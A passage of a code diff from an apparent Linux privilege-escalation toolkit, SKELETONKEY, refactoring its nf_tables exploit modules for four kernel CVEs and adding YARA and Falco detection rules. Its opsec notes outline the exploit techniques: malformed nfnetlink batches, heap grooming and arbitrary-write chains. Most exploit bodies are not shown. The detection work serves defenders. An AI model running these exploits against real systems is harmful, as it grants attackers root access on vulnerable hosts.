        close(sock);
        return r;
    }
-#endif

    /* --- primitive-only path: fork-isolated trigger -------------- *
     * Fork: child enters userns+netns and fires the bug. If the
@@ -1070,6 +1065,28 @@ static skeletonkey_result_t nf_tables_exploit(const struct skeletonkey_ctx *ctx)
    return SKELETONKEY_EXPLOIT_FAIL;
 }

+#else  /* !__linux__ */
+
+/* Non-Linux dev builds: nfnetlink + nf_tables UAF + userns is
+ * Linux-only kernel surface. Stub out cleanly so the module still
+ * registers and `--list` / `--detect-rules` work on macOS/BSD dev
+ * boxes — and so the top-level `make` actually completes there. */
+static skeletonkey_result_t nf_tables_detect(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->json)
+        fprintf(stderr, "[i] nf_tables: Linux-only module "
+                "(nft_verdict_init UAF via nfnetlink) — not applicable here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t nf_tables_exploit(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    fprintf(stderr, "[-] nf_tables: Linux-only module — cannot run here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+
+#endif /* __linux__ */
+
 /* ----- Embedded detection rules ----- */

 static const char nf_tables_auditd[] =
@@ -1107,6 +1124,35 @@ static const char nf_tables_sigma[] =
    "level: high\n"
    "tags: [attack.privilege_escalation, attack.t1068, cve.2024.1086]\n";

+static const char nf_tables_yara[] =
+    "rule nf_tables_cve_2024_1086 : cve_2024_1086 kernel_uaf\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2024-1086\"\n"
+    "        description = \"nf_tables verdict-init UAF breadcrumb log\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $log = \"/tmp/skeletonkey-nft_set_uaf.log\" ascii\n"
+    "    condition:\n"
+    "        $log\n"
+    "}\n";
+
+static const char nf_tables_falco[] =
+    "- rule: nf_tables verdict-init UAF batch by non-root\n"
+    "  desc: |\n"
+    "    Non-root sendmsg on NETLINK_NETFILTER inside a userns,\n"
+    "    delivering an nfnetlink batch with NEWTABLE + NEWCHAIN +\n"
+    "    NEWSET (verdict-key) + NEWSETELEM with malformed NFT_GOTO\n"
+    "    committed twice. CVE-2024-1086 nft_verdict_init double-free.\n"
+    "  condition: >\n"
+    "    evt.type = sendmsg and fd.sockfamily = AF_NETLINK and\n"
+    "    not user.uid = 0\n"
+    "  output: >\n"
+    "    nfnetlink batch from non-root\n"
+    "    (user=%user.name pid=%proc.pid)\n"
+    "  priority: HIGH\n"
+    "  tags: [network, mitre_privilege_escalation, T1068, cve.2024.1086]\n";
+
 const struct skeletonkey_module nf_tables_module = {
    .name           = "nf_tables",
    .cve            = "CVE-2024-1086",
@@ -1119,8 +1165,9 @@ const struct skeletonkey_module nf_tables_module = {
    .cleanup        = NULL,
    .detect_auditd  = nf_tables_auditd,
    .detect_sigma   = nf_tables_sigma,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_yara    = nf_tables_yara,
+    .detect_falco   = nf_tables_falco,
+    .opsec_notes    = "unshare(CLONE_NEWUSER|CLONE_NEWNET) + nfnetlink batch (NEWTABLE + NEWCHAIN/LOCAL_OUT + NEWSET verdict-key + NEWSETELEM malformed NFT_GOTO) committed twice to trigger the nft_verdict_init double-free. msg_msg cg-96 groom with forged pipapo_elem headers; --full-chain sprays kaddr-tagged forged elems and re-fires. Writes /tmp/skeletonkey-nft_set_uaf.log (conditional). Audit-visible via unshare + socket(NETLINK_NETFILTER) + sendmsg batches + msgget/msgsnd. Dmesg: KASAN double-free panic on vulnerable kernels; silent otherwise. Cleanup is finisher-gated; no persistent files on success.",
 };

 void skeletonkey_register_nf_tables(void)
@@ -43,16 +43,21 @@

 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
-#include "../../core/kernel_range.h"
-#include "../../core/offsets.h"
-#include "../../core/finisher.h"

 #include <stdio.h>
 #include <stdlib.h>
-#include <stdint.h>
 #include <string.h>
 #include <stdbool.h>
 #include <unistd.h>
+
+#ifdef __linux__
+
+#include "../../core/kernel_range.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"
+#include "../../core/host.h"
+
+#include <stdint.h>
 #include <sched.h>
 #include <fcntl.h>
 #include <errno.h>
@@ -72,6 +77,7 @@
 #include <linux/netfilter.h>
 #include <linux/netfilter/nfnetlink.h>
 #include <linux/netfilter/nf_tables.h>
+#include "../../core/nft_compat.h"

 /* ------------------------------------------------------------------
 * Kernel range table — fixes per branch.
@@ -99,19 +105,6 @@ static const struct kernel_range nft_fwd_dup_range = {
 * Probes.
 * ------------------------------------------------------------------ */

-static int can_unshare_userns(void)
-{
-    pid_t pid = fork();
-    if (pid < 0) return -1;
-    if (pid == 0) {
-        if (unshare(CLONE_NEWUSER | CLONE_NEWNET) == 0) _exit(0);
-        _exit(1);
-    }
-    int status;
-    waitpid(pid, &status, 0);
-    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
-}
-
 static bool nf_tables_loaded(void)
 {
    FILE *f = fopen("/proc/modules", "r");
@@ -127,45 +120,43 @@ static bool nf_tables_loaded(void)

 static skeletonkey_result_t nft_fwd_dup_detect(const struct skeletonkey_ctx *ctx)
 {
-    struct kernel_version v;
-    if (!kernel_version_current(&v)) {
-        fprintf(stderr, "[!] nft_fwd_dup: could not parse kernel version\n");
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json) fprintf(stderr, "[!] nft_fwd_dup: host fingerprint missing kernel version — bailing\n");
        return SKELETONKEY_TEST_ERROR;
    }

    /* The offload code path only exists from 5.4 onward. Anything
     * older predates the bug. */
-    if (v.major < 5 || (v.major == 5 && v.minor < 4)) {
+    if (!skeletonkey_host_kernel_at_least(ctx->host, 5, 4, 0)) {
        if (!ctx->json) {
            fprintf(stderr, "[i] nft_fwd_dup: kernel %s predates the bug "
-                            "(nft offload hook introduced in 5.4)\n", v.release);
+                            "(nft offload hook introduced in 5.4)\n", v->release);
        }
        return SKELETONKEY_OK;
    }

-    bool patched = kernel_range_is_patched(&nft_fwd_dup_range, &v);
+    bool patched = kernel_range_is_patched(&nft_fwd_dup_range, v);
    if (patched) {
        if (!ctx->json) {
-            fprintf(stderr, "[+] nft_fwd_dup: kernel %s is patched\n", v.release);
+            fprintf(stderr, "[+] nft_fwd_dup: kernel %s is patched\n", v->release);
        }
        return SKELETONKEY_OK;
    }

-    int userns_ok = can_unshare_userns();
+    bool userns_ok = ctx->host->unprivileged_userns_allowed;
    bool nft_loaded = nf_tables_loaded();

    if (!ctx->json) {
        fprintf(stderr, "[i] nft_fwd_dup: kernel %s is in the vulnerable range\n",
-                v.release);
+                v->release);
        fprintf(stderr, "[i] nft_fwd_dup: unprivileged user_ns+net_ns clone: %s\n",
-                userns_ok == 1 ? "ALLOWED" :
-                userns_ok == 0 ? "DENIED" :
-                                 "could not test");
+                userns_ok ? "ALLOWED" : "DENIED");
        fprintf(stderr, "[i] nft_fwd_dup: nf_tables module currently loaded: %s\n",
                nft_loaded ? "yes" : "no (will autoload)");
    }

-    if (userns_ok == 0) {
+    if (!userns_ok) {
        if (!ctx->json) {
            fprintf(stderr, "[+] nft_fwd_dup: kernel vulnerable but user_ns clone "
                            "denied → unprivileged path unreachable\n");
@@ -585,7 +576,6 @@ static int bring_lo_up(void)
    return 0;
 }

-#ifdef __linux__
 static size_t build_trigger_batch(uint8_t *batch, uint32_t *seq)
 {
    size_t off = 0;
@@ -596,7 +586,6 @@ static size_t build_trigger_batch(uint8_t *batch, uint32_t *seq)
    put_batch_end(batch, &off, (*seq)++);
    return off;
 }
-#endif

 /* ------------------------------------------------------------------
 * --full-chain arb-write context. The technique:
@@ -617,8 +606,6 @@ static size_t build_trigger_batch(uint8_t *batch, uint32_t *seq)
 * mismatches as SKELETONKEY_EXPLOIT_FAIL rather than fake success.
 * ------------------------------------------------------------------ */

-#ifdef __linux__
-
 #define SPRAY_QUEUES_ARB        32

 struct fwd_arb_ctx {
@@ -721,8 +708,6 @@ static int nft_fwd_dup_arb_write(uintptr_t kaddr,
    return 0;
 }

-#endif /* __linux__ */
-
 /* ------------------------------------------------------------------
 * Exploit driver.
 * ------------------------------------------------------------------ */
@@ -735,7 +720,8 @@ static skeletonkey_result_t nft_fwd_dup_exploit(const struct skeletonkey_ctx *ct
        return SKELETONKEY_PRECOND_FAIL;
    }
    /* Gate 1: already root? */
-    if (geteuid() == 0) {
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
        if (!ctx->json)
            fprintf(stderr, "[i] nft_fwd_dup: already running as root\n");
        return SKELETONKEY_OK;
@@ -748,11 +734,6 @@ static skeletonkey_result_t nft_fwd_dup_exploit(const struct skeletonkey_ctx *ct
        return pre;
    }

-#ifndef __linux__
-    fprintf(stderr, "[-] nft_fwd_dup: linux-only exploit; non-linux build\n");
-    (void)ctx;
-    return SKELETONKEY_PRECOND_FAIL;
-#else
    if (!ctx->json) {
        if (ctx->full_chain) {
            fprintf(stderr, "[*] nft_fwd_dup: --full-chain — trigger + OOB-write "
@@ -946,7 +927,6 @@ static skeletonkey_result_t nft_fwd_dup_exploit(const struct skeletonkey_ctx *ct
        fprintf(stderr, "[-] nft_fwd_dup: unexpected child rc=%d\n", rc);
    }
    return SKELETONKEY_EXPLOIT_FAIL;
-#endif /* __linux__ */
 }

 /* ------------------------------------------------------------------
@@ -958,7 +938,6 @@ static skeletonkey_result_t nft_fwd_dup_cleanup(const struct skeletonkey_ctx *ct
    if (!ctx->json) {
        fprintf(stderr, "[*] nft_fwd_dup: cleaning up sysv queues + log\n");
    }
-#ifdef __linux__
    /* Best-effort drain of any leftover msg queues with IPC_PRIVATE
     * key owned by us. SysV doesn't enumerate by key, but msgctl
     * IPC_STAT walks /proc/sysvipc/msg to find them. */
@@ -979,13 +958,38 @@ static skeletonkey_result_t nft_fwd_dup_cleanup(const struct skeletonkey_ctx *ct
        }
        fclose(f);
    }
-#endif
    if (unlink("/tmp/skeletonkey-nft_fwd_dup.log") < 0 && errno != ENOENT) {
        /* harmless */
    }
    return SKELETONKEY_OK;
 }

+#else  /* !__linux__ */
+
+/* Non-Linux dev builds: nf_tables / NETLINK_NETFILTER / SysV msg_msg
+ * groom — all Linux-only kernel surface. Stub out so the module still
+ * registers and the top-level `make` completes on macOS/BSD dev boxes. */
+static skeletonkey_result_t nft_fwd_dup_detect(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->json)
+        fprintf(stderr, "[i] nft_fwd_dup: Linux-only module "
+                "(nf_tables HW-offload OOB) — not applicable here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t nft_fwd_dup_exploit(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    fprintf(stderr, "[-] nft_fwd_dup: Linux-only module — cannot run here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t nft_fwd_dup_cleanup(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    return SKELETONKEY_OK;
+}
+
+#endif /* __linux__ */
+
 /* ------------------------------------------------------------------
 * Embedded detection rules.
 * ------------------------------------------------------------------ */
@@ -1024,6 +1028,36 @@ static const char nft_fwd_dup_sigma[] =
    "level: high\n"
    "tags: [attack.privilege_escalation, attack.t1068, cve.2022.25636]\n";

+static const char nft_fwd_dup_yara[] =
+    "rule nft_fwd_dup_cve_2022_25636 : cve_2022_25636 kernel_oob_write\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2022-25636\"\n"
+    "        description = \"nft_fwd/dup actions OOB kmalloc-512 spray tag and log\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $tag = \"SKELETONKEY_FWD\" ascii\n"
+    "        $log = \"/tmp/skeletonkey-nft_fwd_dup.log\" ascii\n"
+    "    condition:\n"
+    "        any of them\n"
+    "}\n";
+
+static const char nft_fwd_dup_falco[] =
+    "- rule: nft_fwd_dup OOB-write batch by non-root\n"
+    "  desc: |\n"
+    "    Non-root nfnetlink batch creating a netdev table with\n"
+    "    HW_OFFLOAD chain containing >15 immediate(NF_ACCEPT)\n"
+    "    expressions + 1 fwd. The offload walk overruns the action\n"
+    "    entries[] array. CVE-2022-25636.\n"
+    "  condition: >\n"
+    "    evt.type = sendmsg and fd.sockfamily = AF_NETLINK and\n"
+    "    not user.uid = 0\n"
+    "  output: >\n"
+    "    nfnetlink HW_OFFLOAD batch from non-root\n"
+    "    (user=%user.name pid=%proc.pid)\n"
+    "  priority: HIGH\n"
+    "  tags: [network, mitre_privilege_escalation, T1068, cve.2022.25636]\n";
+
 const struct skeletonkey_module nft_fwd_dup_module = {
    .name           = "nft_fwd_dup",
    .cve            = "CVE-2022-25636",
@@ -1037,8 +1071,9 @@ const struct skeletonkey_module nft_fwd_dup_module = {
    .cleanup        = nft_fwd_dup_cleanup,
    .detect_auditd  = nft_fwd_dup_auditd,
    .detect_sigma   = nft_fwd_dup_sigma,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_yara    = nft_fwd_dup_yara,
+    .detect_falco   = nft_fwd_dup_falco,
+    .opsec_notes    = "unshare(CLONE_NEWUSER|CLONE_NEWNET) + nfnetlink batch (NEWTABLE netdev + NEWCHAIN HW_OFFLOAD + NEWRULE with 16 immediate(NF_ACCEPT) + 1 fwd). Offload hook walks the rule advertising num_actions+=16 but allocates only the original-actions size -> OOB write at entries[16] into adjacent kmalloc-512. msg_msg groom tagged 'SKELETONKEY_FWD'. Writes /tmp/skeletonkey-nft_fwd_dup.log. Audit-visible via unshare + socket(NETLINK_NETFILTER) + sendmsg + ioctl(SIOCGIFFLAGS/SIOCSIFFLAGS loopback) + msgsnd. Dmesg: KASAN or silent. Cleanup callback drains IPC queues and unlinks log.",
 };

 void skeletonkey_register_nft_fwd_dup(void)
@@ -49,16 +49,21 @@

 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
-#include "../../core/kernel_range.h"
-#include "../../core/offsets.h"
-#include "../../core/finisher.h"

 #include <stdio.h>
 #include <stdlib.h>
-#include <stdint.h>
 #include <string.h>
 #include <stdbool.h>
 #include <unistd.h>
+
+#ifdef __linux__
+
+#include "../../core/kernel_range.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"
+#include "../../core/host.h"
+
+#include <stdint.h>
 #include <sched.h>
 #include <fcntl.h>
 #include <errno.h>
@@ -71,13 +76,11 @@
 #include <sys/mman.h>
 #include <sys/syscall.h>
 #include <arpa/inet.h>
-
-#ifdef __linux__
 #include <linux/netlink.h>
 #include <linux/netfilter.h>
 #include <linux/netfilter/nfnetlink.h>
 #include <linux/netfilter/nf_tables.h>
-#endif
+#include "../../core/nft_compat.h"

 /* ------------------------------------------------------------------
 * Kernel-range table
@@ -87,7 +90,7 @@ static const struct kernel_patched_from nft_payload_patched_branches[] = {
    {4, 14, 302},   /* 4.14.x */
    {4, 19, 269},   /* 4.19.x */
    {5,  4, 229},   /* 5.4.x */
-    {5, 10, 163},   /* 5.10.x */
+    {5, 10, 162},   /* 5.10.x (harmonised with Debian bullseye fix-version) */
    {5, 15,  88},   /* 5.15.x */
    {6,  1,   6},   /* 6.1.x */
    {6,  2,   0},   /* mainline fix in 6.2-rc4 */
@@ -103,19 +106,6 @@ static const struct kernel_range nft_payload_range = {
 * Preconditions probe
 * ------------------------------------------------------------------ */

-static int can_unshare_userns(void)
-{
-    pid_t pid = fork();
-    if (pid < 0) return -1;
-    if (pid == 0) {
-        if (unshare(CLONE_NEWUSER) == 0) _exit(0);
-        _exit(1);
-    }
-    int status;
-    waitpid(pid, &status, 0);
-    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
-}
-
 static bool nf_tables_loaded(void)
 {
    FILE *f = fopen("/proc/modules", "r");
@@ -131,46 +121,44 @@ static bool nf_tables_loaded(void)

 static skeletonkey_result_t nft_payload_detect(const struct skeletonkey_ctx *ctx)
 {
-    struct kernel_version v;
-    if (!kernel_version_current(&v)) {
-        fprintf(stderr, "[!] nft_payload: could not parse kernel version\n");
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json) fprintf(stderr, "[!] nft_payload: host fingerprint missing kernel version — bailing\n");
        return SKELETONKEY_TEST_ERROR;
    }

    /* Bug introduced with the set-payload extension in 5.4. Anything
     * below 5.4 predates the affected codepath entirely. */
-    if (v.major < 5 || (v.major == 5 && v.minor < 4)) {
+    if (!skeletonkey_host_kernel_at_least(ctx->host, 5, 4, 0)) {
        if (!ctx->json) {
            fprintf(stderr, "[i] nft_payload: kernel %s predates the bug "
                            "(set-payload extension landed in 5.4)\n",
-                    v.release);
+                    v->release);
        }
        return SKELETONKEY_OK;
    }

-    bool patched = kernel_range_is_patched(&nft_payload_range, &v);
+    bool patched = kernel_range_is_patched(&nft_payload_range, v);
    if (patched) {
        if (!ctx->json) {
-            fprintf(stderr, "[+] nft_payload: kernel %s is patched\n", v.release);
+            fprintf(stderr, "[+] nft_payload: kernel %s is patched\n", v->release);
        }
        return SKELETONKEY_OK;
    }

-    int userns_ok = can_unshare_userns();
+    bool userns_ok = ctx->host->unprivileged_userns_allowed;
    bool nft_loaded = nf_tables_loaded();

    if (!ctx->json) {
        fprintf(stderr, "[i] nft_payload: kernel %s is in the vulnerable range\n",
-                v.release);
+                v->release);
        fprintf(stderr, "[i] nft_payload: unprivileged user_ns clone: %s\n",
-                userns_ok == 1 ? "ALLOWED" :
-                userns_ok == 0 ? "DENIED" :
-                                 "could not test");
+                userns_ok ? "ALLOWED" : "DENIED");
        fprintf(stderr, "[i] nft_payload: nf_tables module currently loaded: %s\n",
                nft_loaded ? "yes" : "no (will autoload on first nft use)");
    }

-    if (userns_ok == 0) {
+    if (!userns_ok) {
        if (!ctx->json) {
            fprintf(stderr, "[+] nft_payload: kernel vulnerable but user_ns "
                            "clone denied → unprivileged exploit unreachable\n");
@@ -187,8 +175,6 @@ static skeletonkey_result_t nft_payload_detect(const struct skeletonkey_ctx *ctx
    return SKELETONKEY_VULNERABLE;
 }

-#ifdef __linux__
-
 /* ------------------------------------------------------------------
 * userns + netns entry: become root in the new user_ns so subsequent
 * netlink writes carry CAP_NET_ADMIN over our private net_ns.
@@ -801,8 +787,6 @@ static int nft_payload_arb_write(uintptr_t kaddr, const void *buf, size_t len,
    return 0;
 }

-#endif /* __linux__ */
-
 /* ------------------------------------------------------------------
 * Exploit body.
 * ------------------------------------------------------------------ */
@@ -814,7 +798,8 @@ static skeletonkey_result_t nft_payload_exploit(const struct skeletonkey_ctx *ct
                        "exploit code can crash the kernel\n");
        return SKELETONKEY_PRECOND_FAIL;
    }
-    if (geteuid() == 0) {
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
        if (!ctx->json)
            fprintf(stderr, "[i] nft_payload: already running as root\n");
        return SKELETONKEY_OK;
@@ -838,11 +823,6 @@ static skeletonkey_result_t nft_payload_exploit(const struct skeletonkey_ctx *ct
        }
    }

-#ifndef __linux__
-    (void)ctx;
-    fprintf(stderr, "[-] nft_payload: linux-only exploit; non-linux build\n");
-    return SKELETONKEY_PRECOND_FAIL;
-#else
    /* --- --full-chain path: resolve offsets in parent before doing
     * anything destructive. */
    if (ctx->full_chain) {
@@ -1074,7 +1054,6 @@ static skeletonkey_result_t nft_payload_exploit(const struct skeletonkey_ctx *ct
        fprintf(stderr, "[-] nft_payload: unexpected child rc=%d\n", rc);
    }
    return SKELETONKEY_EXPLOIT_FAIL;
-#endif /* __linux__ */
 }

 /* ------------------------------------------------------------------
@@ -1092,6 +1071,32 @@ static skeletonkey_result_t nft_payload_cleanup(const struct skeletonkey_ctx *ct
    return SKELETONKEY_OK;
 }

+#else  /* !__linux__ */
+
+/* Non-Linux dev builds: nf_tables / NETLINK_NETFILTER / SysV msg_msg
+ * groom — all Linux-only kernel surface. Stub out so the module still
+ * registers and the top-level `make` completes on macOS/BSD dev boxes. */
+static skeletonkey_result_t nft_payload_detect(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->json)
+        fprintf(stderr, "[i] nft_payload: Linux-only module "
+                "(nf_tables regset OOB) — not applicable here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t nft_payload_exploit(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    fprintf(stderr, "[-] nft_payload: Linux-only module — cannot run here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t nft_payload_cleanup(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    return SKELETONKEY_OK;
+}
+
+#endif /* __linux__ */
+
 /* ------------------------------------------------------------------
 * Detection rule corpus.
 * ------------------------------------------------------------------ */
@@ -1134,6 +1139,35 @@ static const char nft_payload_sigma[] =
    "level: high\n"
    "tags: [attack.privilege_escalation, attack.t1068, cve.2023.0179]\n";

+static const char nft_payload_yara[] =
+    "rule nft_payload_cve_2023_0179 : cve_2023_0179 kernel_oob_read_write\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2023-0179\"\n"
+    "        description = \"nft_payload OOB-via-verdict-index breadcrumb log\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $log = \"/tmp/skeletonkey-nft_payload.log\" ascii\n"
+    "    condition:\n"
+    "        $log\n"
+    "}\n";
+
+static const char nft_payload_falco[] =
+    "- rule: nft_payload OOB via verdict-code index by non-root\n"
+    "  desc: |\n"
+    "    Non-root nfnetlink batch with an oversized NFTA_SET_DESC\n"
+    "    + NEWSETELEM whose NFTA_PAYLOAD_SREG uses attacker-\n"
+    "    controlled verdict code as an index into regs->data[].\n"
+    "    CVE-2023-0179.\n"
+    "  condition: >\n"
+    "    evt.type = sendmsg and fd.sockfamily = AF_NETLINK and\n"
+    "    not user.uid = 0\n"
+    "  output: >\n"
+    "    nfnetlink payload batch from non-root\n"
+    "    (user=%user.name pid=%proc.pid)\n"
+    "  priority: HIGH\n"
+    "  tags: [network, mitre_privilege_escalation, T1068, cve.2023.0179]\n";
+
 const struct skeletonkey_module nft_payload_module = {
    .name           = "nft_payload",
    .cve            = "CVE-2023-0179",
@@ -1147,8 +1181,9 @@ const struct skeletonkey_module nft_payload_module = {
    .cleanup        = nft_payload_cleanup,
    .detect_auditd  = nft_payload_auditd,
    .detect_sigma   = nft_payload_sigma,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_yara    = nft_payload_yara,
+    .detect_falco   = nft_payload_falco,
+    .opsec_notes    = "unshare(CLONE_NEWUSER|CLONE_NEWNET) + nfnetlink batch (NEWTABLE + NEWCHAIN/LOCAL_OUT + NEWSET with oversized NFTA_SET_DESC + NEWSETELEM whose NFTA_PAYLOAD_SREG = attacker verdict code). On packet eval, regs->verdict.code is used unchecked as index into regs->data[] -> OOB. Dual-slab groom (kmalloc-1k + kmalloc-cg-96). Trigger via sendto(AF_INET, 127.0.0.1:31337). Writes /tmp/skeletonkey-nft_payload.log. Audit-visible via unshare + socket(NETLINK_NETFILTER) + sendmsg + msgsnd + socket(AF_INET)/sendto. Cleanup callback unlinks log.",
 };

 void skeletonkey_register_nft_payload(void)
@@ -50,6 +50,7 @@
 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
 #include "../../core/kernel_range.h"
+#include "../../core/host.h"

 #include <stdio.h>
 #include <stdlib.h>
@@ -78,6 +79,7 @@
 #include <linux/netfilter.h>
 #include <linux/netfilter/nfnetlink.h>
 #include <linux/netfilter/nf_tables.h>
+#include "../../core/nft_compat.h"

 /* NFT_SET_EVAL was added in 5.6; older UAPI headers may not define it.
 * Anonymous-set + lookup exploit shape works on builds with this flag,
@@ -96,9 +98,9 @@
 static const struct kernel_patched_from nft_set_uaf_patched_branches[] = {
    {4, 19, 283},   /* 4.19.x safety patch (bug never reached this branch) */
    {5,  4, 243},   /* 5.4.x   */
-    {5, 10, 180},   /* 5.10.x  */
+    {5, 10, 179},   /* 5.10.x (harmonised with Debian bullseye fix-version) */
    {5, 15, 111},   /* 5.15.x  */
-    {6,  1,  28},   /* 6.1.x   */
+    {6,  1,  27},   /* 6.1.x (harmonised with Debian bookworm fix-version) */
    {6,  2,  15},   /* 6.2.x   */
    {6,  3,   2},   /* 6.3.x   */
    {6,  4,   0},   /* mainline 6.4-rc4 */
@@ -115,19 +117,6 @@ static const struct kernel_range nft_set_uaf_range = {
 * ------------------------------------------------------------------ */

 #ifdef __linux__
-static int can_unshare_userns(void)
-{
-    pid_t pid = fork();
-    if (pid < 0) return -1;
-    if (pid == 0) {
-        if (unshare(CLONE_NEWUSER) == 0) _exit(0);
-        _exit(1);
-    }
-    int status;
-    waitpid(pid, &status, 0);
-    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
-}
-
 static bool nf_tables_loaded(void)
 {
    FILE *f = fopen("/proc/modules", "r");
@@ -148,45 +137,43 @@ static skeletonkey_result_t nft_set_uaf_detect(const struct skeletonkey_ctx *ctx
    (void)ctx;
    return SKELETONKEY_PRECOND_FAIL;
 #else
-    struct kernel_version v;
-    if (!kernel_version_current(&v)) {
-        fprintf(stderr, "[!] nft_set_uaf: could not parse kernel version\n");
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json) fprintf(stderr, "[!] nft_set_uaf: host fingerprint missing kernel version — bailing\n");
        return SKELETONKEY_TEST_ERROR;
    }

    /* Bug introduced in 5.1 (anonymous-set support). Anything below
     * predates it — report OK (not vulnerable to *this* CVE). */
-    if (v.major < 5 || (v.major == 5 && v.minor < 1)) {
+    if (!skeletonkey_host_kernel_at_least(ctx->host, 5, 1, 0)) {
        if (!ctx->json) {
            fprintf(stderr, "[i] nft_set_uaf: kernel %s predates the bug "
-                            "(anonymous-set support landed in 5.1)\n", v.release);
+                            "(anonymous-set support landed in 5.1)\n", v->release);
        }
        return SKELETONKEY_OK;
    }

-    bool patched = kernel_range_is_patched(&nft_set_uaf_range, &v);
+    bool patched = kernel_range_is_patched(&nft_set_uaf_range, v);
    if (patched) {
        if (!ctx->json) {
-            fprintf(stderr, "[+] nft_set_uaf: kernel %s is patched\n", v.release);
+            fprintf(stderr, "[+] nft_set_uaf: kernel %s is patched\n", v->release);
        }
        return SKELETONKEY_OK;
    }

-    int userns_ok = can_unshare_userns();
+    bool userns_ok = ctx->host->unprivileged_userns_allowed;
    bool nft_loaded = nf_tables_loaded();

    if (!ctx->json) {
        fprintf(stderr, "[i] nft_set_uaf: kernel %s is in the vulnerable range\n",
-                v.release);
+                v->release);
        fprintf(stderr, "[i] nft_set_uaf: unprivileged user_ns clone: %s\n",
-                userns_ok == 1 ? "ALLOWED" :
-                userns_ok == 0 ? "DENIED" :
-                                 "could not test");
+                userns_ok ? "ALLOWED" : "DENIED");
        fprintf(stderr, "[i] nft_set_uaf: nf_tables module currently loaded: %s\n",
                nft_loaded ? "yes" : "no (will autoload on first nft use)");
    }

-    if (userns_ok == 0) {
+    if (!userns_ok) {
        if (!ctx->json) {
            fprintf(stderr, "[+] nft_set_uaf: kernel vulnerable but user_ns clone "
                            "denied → unprivileged exploit unreachable\n");
@@ -762,7 +749,8 @@ static skeletonkey_result_t nft_set_uaf_exploit(const struct skeletonkey_ctx *ct
        fprintf(stderr, "[-] nft_set_uaf: refusing without --i-know gate\n");
        return SKELETONKEY_EXPLOIT_FAIL;
    }
-    if (geteuid() == 0) {
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
        if (!ctx->json)
            fprintf(stderr, "[i] nft_set_uaf: already running as root\n");
        return SKELETONKEY_OK;
@@ -1034,6 +1022,37 @@ static const char nft_set_uaf_sigma[] =
    "level: high\n"
    "tags: [attack.privilege_escalation, attack.t1068, cve.2023.32233]\n";

+static const char nft_set_uaf_yara[] =
+    "rule nft_set_uaf_cve_2023_32233 : cve_2023_32233 kernel_uaf\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2023-32233\"\n"
+    "        description = \"nft anonymous-set UAF spray tag (SKELETONKEY_SET) and log breadcrumb\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $tag = \"SKELETONKEY_SET\" ascii\n"
+    "        $log = \"/tmp/skeletonkey-nft_set_uaf.log\" ascii\n"
+    "    condition:\n"
+    "        any of them\n"
+    "}\n";
+
+static const char nft_set_uaf_falco[] =
+    "- rule: nft anonymous-set lookup-UAF batch by non-root\n"
+    "  desc: |\n"
+    "    Non-root nfnetlink single-batch transaction: NEWTABLE +\n"
+    "    NEWCHAIN + NEWSET (anonymous, EVAL) + NEWRULE with\n"
+    "    nft_lookup referencing the anon set + DELSET + DELRULE.\n"
+    "    The lookup's set reference isn't deactivated; UAF when\n"
+    "    set frees. CVE-2023-32233.\n"
+    "  condition: >\n"
+    "    evt.type = sendmsg and fd.sockfamily = AF_NETLINK and\n"
+    "    not user.uid = 0\n"
+    "  output: >\n"
+    "    nfnetlink anon-set batch from non-root\n"
+    "    (user=%user.name pid=%proc.pid)\n"
+    "  priority: HIGH\n"
+    "  tags: [network, mitre_privilege_escalation, T1068, cve.2023.32233]\n";
+
 const struct skeletonkey_module nft_set_uaf_module = {
    .name           = "nft_set_uaf",
    .cve            = "CVE-2023-32233",
@@ -1046,8 +1065,9 @@ const struct skeletonkey_module nft_set_uaf_module = {
    .cleanup        = nft_set_uaf_cleanup,
    .detect_auditd  = nft_set_uaf_auditd,
    .detect_sigma   = nft_set_uaf_sigma,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_yara    = nft_set_uaf_yara,
